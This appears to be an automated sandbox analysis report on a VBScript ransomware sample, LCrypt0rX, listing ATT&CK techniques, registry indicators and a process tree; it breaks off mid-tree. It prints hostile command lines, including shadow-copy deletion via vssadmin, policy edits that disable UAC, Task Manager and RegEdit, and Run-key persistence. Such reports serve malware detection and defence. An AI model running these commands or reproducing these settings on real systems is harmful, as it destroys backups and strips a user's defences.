80c5e8f13d838fd509ddb0eaa4daf63c8d09b4d34556794cbcaec20875210208

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	wscript.exe

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Blocklisted process makes network request 2 IoCs

flow	pid	Process
6	4768	wscript.exe
8	4768	wscript.exe

Blocks application from running via registry modification 3 IoCs

Adds application to list of disallowed applications.

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	wscript.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "msconfig.exe"	wscript.exe

Disables RegEdit via registry modification 1 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	wscript.exe

Checks computer location settings 2 TTPs 28 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	wscript.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MyStartupScript = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransom.Win32.LCrypt0rX.A\\LCrypt0rX.vbs"	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\iamthedoom = "C:\\Windows\\System32\\iamthedoom.bat"	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SpamScript = "C:\\Windows\\System32\\haha.vbs"	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wins32BugFix = "C:\\Windows\\System32\\wins32bugfix.vbs"	wscript.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	wscript.exe

Drops file in System32 directory 6 IoCs

description	ioc	Process
File created	C:\Windows\System32\wins32bugfix.vbs	wscript.exe
File opened for modification	C:\Windows\System32\wins32bugfix.vbs	wscript.exe
File created	C:\Windows\System32\iamthedoom.bat	wscript.exe
File opened for modification	C:\Windows\System32\iamthedoom.bat	wscript.exe
File created	C:\Windows\System32\haha.vbs	wscript.exe
File opened for modification	C:\Windows\System32\haha.vbs	wscript.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\gcrybground.png"	wscript.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
952	vssadmin.exe

Kills process with taskkill 64 IoCs

pid	Process
13060	taskkill.exe
13340	taskkill.exe
17968	taskkill.exe
15880	taskkill.exe
12700	taskkill.exe
6452	taskkill.exe
10936	taskkill.exe
14120	taskkill.exe
9332	taskkill.exe
16428	taskkill.exe
1132	taskkill.exe
9132	taskkill.exe
12652	taskkill.exe
15980	taskkill.exe
15836	taskkill.exe
8528	taskkill.exe
2356	taskkill.exe
8932	taskkill.exe
8576	taskkill.exe
9956	taskkill.exe
964	taskkill.exe
5196	taskkill.exe
18368	taskkill.exe
6844	taskkill.exe
8940	taskkill.exe
13236	taskkill.exe
12920	taskkill.exe
8444	taskkill.exe
5268	taskkill.exe
6140	taskkill.exe
8444	taskkill.exe
11340	taskkill.exe
4532	taskkill.exe
5392	taskkill.exe
16344	taskkill.exe
7044	taskkill.exe
7164	taskkill.exe
8752	taskkill.exe
8480	taskkill.exe
2280	taskkill.exe
12552	taskkill.exe
8368	taskkill.exe
12920	taskkill.exe
12168	taskkill.exe
15276	taskkill.exe
16108	taskkill.exe
3736	taskkill.exe
5532	taskkill.exe
10700	taskkill.exe
8820	taskkill.exe
17856	taskkill.exe
18016	taskkill.exe
18200	taskkill.exe
3260	taskkill.exe
14300	taskkill.exe
10464	taskkill.exe
15116	taskkill.exe
16916	taskkill.exe
16420	taskkill.exe
15224	taskkill.exe
18584	taskkill.exe
3476	taskkill.exe
10872	taskkill.exe
15064	taskkill.exe

Modifies Control Panel 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Control Panel\Mouse	wscript.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Desktop	wscript.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings	calc.exe

Opens file in notepad (likely ransom note) 2 IoCs

ransomware

pid	Process
1864	notepad.exe
18496	notepad.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	6	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	8	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
1308	mspaint.exe
1308	mspaint.exe
3116	msedge.exe
3116	msedge.exe
5184	msedge.exe
5184	msedge.exe
4008	msedge.exe
4008	msedge.exe
5960	msedge.exe
5960	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

description	pid	Process
Token: SeBackupPrivilege	1520	vssvc.exe
Token: SeRestorePrivilege	1520	vssvc.exe
Token: SeAuditPrivilege	1520	vssvc.exe
Token: SeDebugPrivilege	3736	taskkill.exe
Token: SeDebugPrivilege	3476	taskkill.exe
Token: SeDebugPrivilege	284	taskkill.exe
Token: SeDebugPrivilege	4848	taskkill.exe
Token: SeDebugPrivilege	5532	taskkill.exe
Token: SeDebugPrivilege	3260	taskkill.exe
Token: SeDebugPrivilege	6452	taskkill.exe
Token: SeDebugPrivilege	6844	taskkill.exe
Token: 33	6972	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	6972	AUDIODG.EXE

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe
4008	msedge.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
1308	mspaint.exe
1308	mspaint.exe
1308	mspaint.exe
1308	mspaint.exe
1176	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1704 wrote to memory of 4768	1704	WScript.exe	84
PID 1704 wrote to memory of 4768	1704	WScript.exe	84
PID 4768 wrote to memory of 4800	4768	wscript.exe	85
PID 4768 wrote to memory of 4800	4768	wscript.exe	85
PID 4800 wrote to memory of 952	4800	cmd.exe	87
PID 4800 wrote to memory of 952	4800	cmd.exe	87
PID 4768 wrote to memory of 1864	4768	wscript.exe	90
PID 4768 wrote to memory of 1864	4768	wscript.exe	90
PID 4768 wrote to memory of 2280	4768	wscript.exe	94
PID 4768 wrote to memory of 2280	4768	wscript.exe	94
PID 4768 wrote to memory of 4340	4768	wscript.exe	96
PID 4768 wrote to memory of 4340	4768	wscript.exe	96
PID 4768 wrote to memory of 4884	4768	wscript.exe	98
PID 4768 wrote to memory of 4884	4768	wscript.exe	98
PID 4768 wrote to memory of 1668	4768	wscript.exe	99
PID 4768 wrote to memory of 1668	4768	wscript.exe	99
PID 4768 wrote to memory of 3736	4768	wscript.exe	100
PID 4768 wrote to memory of 3736	4768	wscript.exe	100
PID 4884 wrote to memory of 1948	4884	wscript.exe	102
PID 4884 wrote to memory of 1948	4884	wscript.exe	102
PID 1668 wrote to memory of 3476	1668	wscript.exe	103
PID 1668 wrote to memory of 3476	1668	wscript.exe	103
PID 4340 wrote to memory of 1308	4340	cmd.exe	105
PID 4340 wrote to memory of 1308	4340	cmd.exe	105
PID 1948 wrote to memory of 4496	1948	wscript.exe	107
PID 1948 wrote to memory of 4496	1948	wscript.exe	107
PID 4496 wrote to memory of 1984	4496	wscript.exe	114
PID 4496 wrote to memory of 1984	4496	wscript.exe	114
PID 1668 wrote to memory of 284	1668	wscript.exe	115
PID 1668 wrote to memory of 284	1668	wscript.exe	115
PID 4340 wrote to memory of 4008	4340	cmd.exe	116
PID 4340 wrote to memory of 4008	4340	cmd.exe	116
PID 1984 wrote to memory of 4276	1984	wscript.exe	119
PID 1984 wrote to memory of 4276	1984	wscript.exe	119
PID 4008 wrote to memory of 5024	4008	msedge.exe	120
PID 4008 wrote to memory of 5024	4008	msedge.exe	120
PID 4340 wrote to memory of 4568	4340	cmd.exe	121
PID 4340 wrote to memory of 4568	4340	cmd.exe	121
PID 4340 wrote to memory of 4268	4340	cmd.exe	122
PID 4340 wrote to memory of 4268	4340	cmd.exe	122
PID 4568 wrote to memory of 300	4568	msedge.exe	123
PID 4568 wrote to memory of 300	4568	msedge.exe	123
PID 4276 wrote to memory of 912	4276	wscript.exe	124
PID 4276 wrote to memory of 912	4276	wscript.exe	124
PID 1668 wrote to memory of 4848	1668	wscript.exe	125
PID 1668 wrote to memory of 4848	1668	wscript.exe	125
PID 4340 wrote to memory of 2164	4340	cmd.exe	127
PID 4340 wrote to memory of 2164	4340	cmd.exe	127
PID 2164 wrote to memory of 3632	2164	msedge.exe	128
PID 2164 wrote to memory of 3632	2164	msedge.exe	128
PID 912 wrote to memory of 1944	912	wscript.exe	129
PID 912 wrote to memory of 1944	912	wscript.exe	129
PID 4008 wrote to memory of 1592	4008	msedge.exe	131
PID 4008 wrote to memory of 1592	4008	msedge.exe	131
PID 4008 wrote to memory of 1592	4008	msedge.exe	131
PID 4008 wrote to memory of 1592	4008	msedge.exe	131
PID 4008 wrote to memory of 1592	4008	msedge.exe	131
PID 4008 wrote to memory of 1592	4008	msedge.exe	131
PID 4008 wrote to memory of 1592	4008	msedge.exe	131
PID 4008 wrote to memory of 1592	4008	msedge.exe	131
PID 4008 wrote to memory of 1592	4008	msedge.exe	131
PID 4008 wrote to memory of 1592	4008	msedge.exe	131
PID 4008 wrote to memory of 1592	4008	msedge.exe	131
PID 4008 wrote to memory of 1592	4008	msedge.exe	131

System policy modification 1 TTPs 15 IoCs

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1"	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	wscript.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisableCMD = "1"	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1"	wscript.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\InactivityTimeoutSecs = "0"	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "msconfig.exe"	wscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	wscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun = "1"	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	wscript.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	wscript.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Ransom.Win32.LCrypt0rX.A\LCrypt0rX.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1704
- C:\Windows\System32\wscript.exe
  "C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\Ransom.Win32.LCrypt0rX.A\LCrypt0rX.vbs" /elevated
  2⤵
  - UAC bypass
  - Blocklisted process makes network request
  - Blocks application from running via registry modification
  - Disables RegEdit via registry modification
  - Checks computer location settings
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Drops file in System32 directory
  - Sets desktop wallpaper using registry
  - Modifies Control Panel
  - Suspicious use of WriteProcessMemory
  - System policy modification
  PID:4768
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4800
  - - C:\Windows\system32\vssadmin.exe
      vssadmin delete shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:952
- - C:\Windows\System32\notepad.exe
    "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\READMEPLEASE.txt
    3⤵
    - Opens file in notepad (likely ransom note)
    PID:1864
- - C:\Windows\System32\RUNDLL32.EXE
    "C:\Windows\System32\RUNDLL32.EXE" user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Windows\System32\iamthedoom.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4340
  - - C:\Windows\system32\mspaint.exe
      mspaint
      4⤵
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of SetWindowsHookEx
      PID:1308
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://languishcharmingwidely.com/22/f4/31/22f431404146fb2f892b30f7d213aea4.js
      4⤵
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:4008
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff8829c46f8,0x7ff8829c4708,0x7ff8829c4718
        5⤵
        
        PID:5024
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1992,3394373990822613098,716070299742379754,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2028 /prefetch:2
        5⤵
        
        PID:1592
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1992,3394373990822613098,716070299742379754,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3116
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1992,3394373990822613098,716070299742379754,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:8
        5⤵
        
        PID:1144
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3394373990822613098,716070299742379754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
        5⤵
        
        PID:5240
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3394373990822613098,716070299742379754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
        5⤵
        
        PID:5256
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3394373990822613098,716070299742379754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3952 /prefetch:1
        5⤵
        
        PID:5672
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3394373990822613098,716070299742379754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4192 /prefetch:1
        5⤵
        
        PID:5744
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3394373990822613098,716070299742379754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4380 /prefetch:1
        5⤵
        
        PID:5940
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3394373990822613098,716070299742379754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4324 /prefetch:1
        5⤵
        
        PID:5612
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3394373990822613098,716070299742379754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5092 /prefetch:1
        5⤵
        
        PID:6272
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1992,3394373990822613098,716070299742379754,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5028 /prefetch:8
        5⤵
        
        PID:6852
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1992,3394373990822613098,716070299742379754,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5868 /prefetch:8
        5⤵
        
        PID:6980
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3394373990822613098,716070299742379754,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6092 /prefetch:1
        5⤵
        
        PID:8160
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3394373990822613098,716070299742379754,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5376 /prefetch:1
        5⤵
        
        PID:8168
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3394373990822613098,716070299742379754,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6492 /prefetch:1
        5⤵
        
        PID:8600
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1992,3394373990822613098,716070299742379754,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3328 /prefetch:8
        5⤵
        
        PID:10964
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1992,3394373990822613098,716070299742379754,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3328 /prefetch:8
        5⤵
        
        PID:12316
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
